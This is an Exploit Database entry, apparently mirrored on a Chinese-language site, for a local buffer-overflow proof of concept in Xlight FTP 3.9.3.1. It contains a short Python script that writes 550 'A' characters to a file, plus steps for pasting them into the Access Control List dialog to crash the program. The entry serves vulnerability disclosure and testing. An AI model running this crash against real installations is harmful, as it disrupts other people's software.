Xlight FTP 3.9.3.1 – Buffer Overflow (PoC)

• Exploit Database
• 16 阅读

• 作者： Yehia Elghaly
  日期： 2021-11-12
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50516/

• # Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
  # Discovered by: Yehia Elghaly
  # Discovered Date: 2021-11-12
  # Vendor Homepage: https://www.xlightftpd.com/
  # Software Link: https://www.xlightftpd.com/download/setup.exe
  # Tested Version: 3.9.3.1
  # Vulnerability Type: Buffer Overflow Local
  # Tested on OS: Windows XP SP3 -Windows 7 Professional x86 SP1 - Windows 10 x64
  
  # Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)
  
  # Steps to reproduce:
  # 1. - Download and Xlight FTP
  # 2. - Run the python script and it will create exploit.txt file.
  # 3. - Open Xlight FTP 3.9.3.1
  # 4. - "File and Directory - Access Control List - Setup - Added users list directories
  # 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied
  # 6. - Go to Setup -> added -> Enter new Item -Paste the characters 
  # 7- Crashed
  
  #!/usr/bin/python
  
  exploit = 'A' * 550
  
  try: 
  file = open("exploit.txt","w")
  file.write(exploit)
  file.close()
  
  print("POC is created")
  except:
  print("POC not created")